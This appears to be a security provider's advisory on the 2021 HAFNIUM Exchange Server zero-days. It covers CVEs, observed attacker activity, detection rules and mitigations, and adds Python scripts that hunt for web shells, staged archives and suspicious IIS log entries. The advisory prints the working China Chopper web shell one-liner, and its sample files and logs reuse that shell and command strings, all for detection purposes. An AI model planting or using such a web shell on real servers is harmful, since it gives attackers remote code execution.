
Critical Exchange Vulnerability: Quick Grab on Detection & Mitigation

Background:

Microsoft has detected multiple zero-day exploits against on-premises versions of Microsoft Exchange Server (2013, 2016, and 2019). Microsoft attributes this campaign with high confidence to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.

On March 2nd, 2021, Microsoft released a blog post that detailed multiple zero-day vulnerabilities used to attack on-premises versions of Microsoft Exchange Server. [Note: Exchange Online is not affected]

| CVE | Vulnerability Type | CVSSv3 | Usage of the exploit | Exploitability Assessment |
|---|---|---|---|---|
| CVE-2021-26855 | Server Side Request Forgery [SSRF] | 9.1 | Send arbitrary HTTP requests and authenticate as the Exchange server. | Yes |
| CVE-2021-26857 | Insecure Deserialization | 7.8 | Gives the threat actor the ability to run code as SYSTEM. | Yes |
| CVE-2021-26858 | Arbitrary File Write | 7.8 | Ability to write web shells to the Exchange servers. | Yes |
| CVE-2021-27065 | Arbitrary File Write | 7.8 | Post-authentication file-write vulnerability, combined with CVE-2021-26855 to elevate privileges. | Yes |

What did we observe?

We have captured here what we saw in the initial days across our MDR Global Delivery Centers (GDC) post disclosure of the high-impact Microsoft Exchange Server vulnerability.

Reconnaissance:

Our MDR GDCs observed active reconnaissance attempts from the cybercrime syndicates given below. A few of these IPs are associated with Tor relay networks.

  • IP addresses commonly seen in reconnaissance activity

These connections are part of initial reconnaissance to identify whether the service hosted on the targeted asset is an Exchange server.

Exploitation:

We have observed multiple exploit attempts across various organizations, and some examples are given below:

  • An attempt was made to access specific files and paths within the Exchange Control Panel [ECP] vDir
    • In an organization that had not exposed the ECP console, or had restricted the services exposed, we observed error code 404 [Not Found] from the IIS server
    • In an organization where the Exchange services were not restricted, we observed status code 200 [HTTP OK]
    • In an organization where the Exchange services were placed behind a VPN service, we observed no active exploitation of the vulnerability

Execution:

  • Usage of web shells
    • By leveraging CVE-2021-26858, the threat actor dropped web shells to the paths /inetpub/wwwroot/aspnet_client/ and $($env:exchangeinstallpath)/Frontend/.
    • The attackers dropped the known web shell "China Chopper" by using the PowerShell Set-OabVirtualDirectory cmdlet.

http://Server/V15/ClientAccess/OAB/<script language="JScript" runat="server">function Page_Load(){eval(Request["NO9BxmCXw0JE"],"unsafe");}</script>

Note: these web shells were attributed to the China Chopper web shell, a backdoor widely used by Chinese threat actors.
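As an added example (not code from the original post), the following Python script hunts for the kind of web shell described above: it walks the IIS content directories the write-up names and flags ASP.NET files that contain a server-side script block which evaluates request input, the pattern the China Chopper one-liner above follows. The directory layout and file names below are constructed for the demonstration; on a real server you would point scan_for_webshells at inetpub\wwwroot and the Exchange FrontEnd directory.

```python
import os
import re
import tempfile
from pathlib import Path

# Hypothetical hunting script: flags ASP.NET content files that carry a
# server-side script block which evals data taken from the request.
SCRIPT_EXTS = {".aspx", ".asp", ".ashx", ".asmx"}

# <script ... runat="server"> (quotes optional, any case)
RUNAT_SERVER = re.compile(r"<script[^>]*runat\s*=\s*[\"']?server[\"']?", re.IGNORECASE)
# eval(Request[...]) / eval(Request.Item[...]) / Eval(Request.Form(...)):
# dynamic code built straight from request input
EVAL_REQUEST = re.compile(r"\beval\s*\(\s*Request(?:\.\w+)?\s*[\[(]", re.IGNORECASE)


def is_chopper_like(content: str) -> bool:
    """True when the file has a server-side script block that evals request input."""
    return bool(RUNAT_SERVER.search(content)) and bool(EVAL_REQUEST.search(content))


def scan_for_webshells(root):
    """Walk `root` and return sorted, root-relative paths of suspicious script files."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if Path(name).suffix.lower() not in SCRIPT_EXTS:
                continue  # only ASP.NET content can run server-side
            path = Path(dirpath) / name
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue  # unreadable file: skip rather than abort the hunt
            if is_chopper_like(text):
                hits.append(str(path.relative_to(root)).replace(os.sep, "/"))
    return sorted(hits)


def build_sample_tree():
    """Constructed sample tree mimicking the two drop locations named in the post."""
    root = Path(tempfile.mkdtemp(prefix="exch_hunt_"))
    shell_dir = root / "inetpub" / "wwwroot" / "aspnet_client"
    shell_dir.mkdir(parents=True)
    # Constructed file carrying the one-liner quoted in the post
    (shell_dir / "system_web.aspx").write_text(
        '<script language="JScript" runat="server">'
        'function Page_Load(){eval(Request["NO9BxmCXw0JE"],"unsafe");}</script>'
    )
    legit = root / "FrontEnd" / "HttpProxy" / "owa" / "auth"
    legit.mkdir(parents=True)
    # Benign page: no server-side eval of request input
    (legit / "logon.aspx").write_text('<%@ Page Language="C#" %>\n<html><body>Sign in</body></html>')
    # Text file mentioning the pattern is ignored: it cannot execute
    (legit / "readme.txt").write_text('eval(Request["x"]) is discussed here only')
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for hit in scan_for_webshells(sample_root):
        print("suspicious:", hit)
```

Hash-based IoC matching misses a re-keyed or re-encoded shell; matching on the runat="server" plus eval-of-request structure catches the family regardless of the parameter name, at the cost of the occasional false positive that an analyst reviews by hand.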

  • Process injection
    • Running as SYSTEM inside UMWorkerProcess.exe, the attacker uses CVE-2021-26857 to execute PowerShell, then downloads and runs powercat.
  • Usage of privileged commands
    • Observed commands such as "attrib", "cmd" and "PowerShell" in IIS logs.
    • Addition of PowerShell snap-ins
      • Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn
  • Web log User-Agents
    • Non-standard user agents were observed in the IIS logs (IIS writes spaces in the User-Agent field as "+")
      • ExchangeServicesClient/0.0.0.0
      • python-requests/2.25.1
      • python-requests/2.19.1
      • Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html
      • Mozilla/5.0+(compatible;+Konqueror/3.5;+Linux)+KHTML/3.5.5+(like+Gecko)+(Exabot-Thumbnails)
      • Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp)
      • Mozilla/5.0+(compatible;+YandexBot/3.0;++http://yandex.com/bots)

Data Exfiltration:

  • To exfiltrate data, we expect attackers to compress the Outlook address book, user mailboxes, etc. into .zip, .rar and .7z files under a specific folder, C:\ProgramData\, before the actual exfiltration attempt
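An added hunting example for the staging behaviour described above (not part of the original post): it lists recently modified archives under a staging directory. It goes a little beyond the text by checking the file header (zip, RAR and 7z magic bytes) as well as the extension, so an archive renamed to something innocuous such as .dat is still reported. The directory and files are constructed inline; in practice you would run find_staged_archives against C:\ProgramData.

```python
import os
import time
import tempfile
from pathlib import Path

# Hypothetical hunting helper: reports archive files modified recently under a
# staging directory, matching on extension or on the archive's magic bytes.
ARCHIVE_EXTS = {".zip", ".rar", ".7z"}
ARCHIVE_MAGIC = {
    b"PK\x03\x04": "zip",            # local file header of a zip
    b"Rar!\x1a\x07": "rar",          # prefix shared by RAR 1.5-4.x and RAR5
    b"7z\xbc\xaf\x27\x1c": "7z",     # 7-Zip signature
}


def archive_kind(path):
    """Return 'zip', 'rar' or '7z' when the header matches, else None."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(8)
    except OSError:
        return None
    for magic, kind in ARCHIVE_MAGIC.items():
        if head.startswith(magic):
            return kind
    return None


def find_staged_archives(root, max_age_hours=24, now=None):
    """List archives under `root` modified within `max_age_hours`, sorted by path."""
    now = time.time() if now is None else now
    cutoff = now - max_age_hours * 3600
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            try:
                st = path.stat()
            except OSError:
                continue
            if st.st_mtime < cutoff:
                continue  # older than the hunting window
            kind = archive_kind(path)
            by_ext = path.suffix.lower() in ARCHIVE_EXTS
            if kind or by_ext:
                findings.append({
                    "path": str(path.relative_to(root)).replace(os.sep, "/"),
                    "kind": kind or "by-extension",
                    "size": st.st_size,
                    # header says archive but the name does not: likely disguised
                    "renamed": bool(kind) and not by_ext,
                })
    return sorted(findings, key=lambda f: f["path"])


def build_sample_staging_dir():
    """Constructed stand-in for C:\\ProgramData with fresh, disguised and stale files."""
    root = Path(tempfile.mkdtemp(prefix="programdata_"))
    (root / "mailboxes.zip").write_bytes(b"PK\x03\x04" + b"\0" * 60)
    (root / "update.dat").write_bytes(b"7z\xbc\xaf\x27\x1c" + b"\0" * 40)  # 7z renamed to .dat
    old = root / "old_backup.rar"
    old.write_bytes(b"Rar!\x1a\x07\x00" + b"\0" * 20)
    stale = time.time() - 30 * 24 * 3600  # 30 days old: outside a 24h window
    os.utime(old, (stale, stale))
    (root / "notes.txt").write_text("nothing to see")
    return root


if __name__ == "__main__":
    for f in find_staged_archives(build_sample_staging_dir(), max_age_hours=24):
        print(f)
```

A short window (24 hours) keeps the output actionable during an incident; widen max_age_hours to look back over the full exposure period when scoping what may already have left the network.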

How to Detect

This section captures key techniques for detecting active exploitation of the Microsoft Exchange Server vulnerabilities, in addition to known IoC-based detection using threat intelligence and EPP/EDR.

Threat Hunting using Machine Learning Models:

  • Data Exfiltration: Based on User and Entity profiling within the environment, we can establish normal traffic baselines, which can then be compared with inconsistent patterns [sudden Increase in data traffic, large download of data traffic, Exfiltration to newly registered domain etc.]
  • Process Baselining: Frequency & pattern analysis will assist in detecting outliers. This is useful to detect new processes launched to establish persistence, lateral movement, and data exfiltration
  • Lateral Movement: Entity profiling within the environment’s regular traffic can be compared with established baselines to detect inconsistent patterns [Sudden increase in the number of connections, Connections to multiple destinations within a short period, connection to a high number of ports etc.]

Using SIEM Correlation Rules

  • Monitor Web server logs for the following
    • High number of error codes [400, 401, 404]
    • Usage of Suspicious User Agents
    • Connections from a suspicious IP address
    • Uncommon HTTP referrers
    • Missing HTTP referrers
  • Lateral Movement
    • Validate all RPC, SMB, WMI protocol connections
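The following added example (not the post's own tooling) turns the web-server rules above, together with the non-standard User-Agent list from the Execution section, into detection logic that runs over IIS W3C extended log lines: it parses the #Fields: header, flags the listed user agents, counts 400/401/404 responses per client, reports POSTs to sensitive Exchange paths with no referrer, and looks for command names (attrib, cmd, powershell) in the request. The log lines, IP addresses and path names are constructed for the demonstration; the threshold of three errors per client and the set of sensitive path prefixes are assumptions to tune for your environment.

```python
import re
from collections import Counter, defaultdict

# User agents listed in the post (IIS logs spaces as '+')
SUSPICIOUS_UA = {
    "ExchangeServicesClient/0.0.0.0",
    "python-requests/2.25.1",
    "python-requests/2.19.1",
    "Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html",
    "Mozilla/5.0+(compatible;+Konqueror/3.5;+Linux)+KHTML/3.5.5+(like+Gecko)+(Exabot-Thumbnails)",
    "Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp)",
    "Mozilla/5.0+(compatible;+YandexBot/3.0;++http://yandex.com/bots)",
}
ERROR_CODES = {"400", "401", "404"}
ERROR_THRESHOLD = 3                       # assumed: tune per environment
SENSITIVE_PREFIXES = ("/ecp/", "/owa/auth/", "/aspnet_client/", "/autodiscover/")  # assumed
COMMAND_TOKENS = re.compile(r"\b(attrib|cmd|powershell)\b", re.IGNORECASE)

# Constructed sample log (W3C extended format); not real traffic.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-03-03 10:15:01 10.0.0.5 GET /owa/auth/logon.aspx - 443 - 192.0.2.10 Mozilla/5.0+(Windows+NT+10.0)+Chrome/88.0 https://mail.example.com/owa/ 200 0 0 120
2021-03-03 10:15:02 10.0.0.5 GET /ecp/ - 443 - 198.51.100.7 python-requests/2.25.1 - 404 0 2 3
2021-03-03 10:15:03 10.0.0.5 GET /ecp/a.css - 443 - 198.51.100.7 python-requests/2.25.1 - 404 0 2 3
2021-03-03 10:15:04 10.0.0.5 GET /ecp/b.js - 443 - 198.51.100.7 python-requests/2.25.1 - 404 0 2 3
2021-03-03 10:15:05 10.0.0.5 POST /owa/auth/x.css - 443 - 198.51.100.7 python-requests/2.25.1 - 401 0 0 5
2021-03-03 10:15:20 10.0.0.5 POST /ecp/y.js - 443 - 203.0.113.9 ExchangeServicesClient/0.0.0.0 - 200 0 0 40
2021-03-03 10:16:00 10.0.0.5 GET /aspnet_client/system_web/x.aspx cmd=powershell+attrib 443 - 203.0.113.9 Mozilla/5.0+(compatible;+YandexBot/3.0;++http://yandex.com/bots) - 200 0 0 15
2021-03-03 10:16:30 10.0.0.5 GET /owa/ - 443 jdoe 192.0.2.10 Mozilla/5.0+(Windows+NT+10.0)+Chrome/88.0 https://mail.example.com/owa/ 200 0 0 80
"""


def parse_iis_w3c(text):
    """Parse W3C extended log text into dicts keyed by the #Fields: names."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split(" ")          # values never contain spaces (encoded as '+')
        if len(parts) != len(fields):
            continue                     # truncated or malformed line
        rows.append(dict(zip(fields, parts)))
    return rows


def analyze(rows):
    """Return (rule, client_ip, detail) findings for the SIEM-style rules."""
    findings, errors, seen_ua = [], Counter(), set()
    for r in rows:
        ip, ua, uri = r["c-ip"], r["cs(User-Agent)"], r["cs-uri-stem"]
        query, ref, status, method = r["cs-uri-query"], r["cs(Referer)"], r["sc-status"], r["cs-method"]
        sensitive = uri.lower().startswith(SENSITIVE_PREFIXES)
        if (ua in SUSPICIOUS_UA or ua.startswith("python-requests/")) and (ip, ua) not in seen_ua:
            seen_ua.add((ip, ua))        # report each client/agent pair once
            findings.append(("suspicious_user_agent", ip, ua))
        if status in ERROR_CODES:
            errors[ip] += 1
        if sensitive and method == "POST" and ref == "-":
            findings.append(("missing_referer_on_post", ip, uri))
        if COMMAND_TOKENS.search(query) or COMMAND_TOKENS.search(uri):
            findings.append(("command_in_request", ip, f"{uri}?{query}"))
    for ip, n in errors.items():
        if n >= ERROR_THRESHOLD:
            findings.append(("high_error_count", ip, f"{n} responses in {sorted(ERROR_CODES)}"))
    return findings


def summarize_by_client(findings):
    """Map each client IP to the sorted list of rules it triggered."""
    by_ip = defaultdict(set)
    for rule, ip, _detail in findings:
        by_ip[ip].add(rule)
    return {ip: sorted(rules) for ip, rules in by_ip.items()}


if __name__ == "__main__":
    for ip, rules in summarize_by_client(analyze(parse_iis_w3c(SAMPLE_LOG))).items():
        print(ip, rules)
```

Any single rule here fires on benign traffic too (a misconfigured monitor will produce 404s; a crawler may hit /owa/); the correlation value comes from a client that trips several rules in a short window, which is why the summary groups findings per client IP.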

YARA Rules

  • Rules to detect signs of compromise [Refer to Appendix]

Mitigation
We have summarized mitigation steps for immediate action.

  • Apply the security updates for Exchange Server to ensure all relevant vulnerabilities are fixed.
  • If the security updates cannot be applied to the Exchange server immediately, perform the following
    • Disable the ECP application pool to mitigate CVE-2021-27065
    • Disable the OAB application pool to mitigate CVE-2021-26858
    • Wherever possible, limit the exposure of Exchange web services to the public network. A VPN service should be in place to restrict access to Exchange
  • Detect and restrict the below-listed indicators of compromise
    • Web shell hashes
    • Reconnaissance activity

* Tor exit nodes
** Geography [China, Hong Kong & Japan]

Microsoft has released a feed of indicators of compromise (IOCs) observed in related attacks. The feed is available in both CSV and JSON formats, and the information is shared as TLP:WHITE.

Appendix:

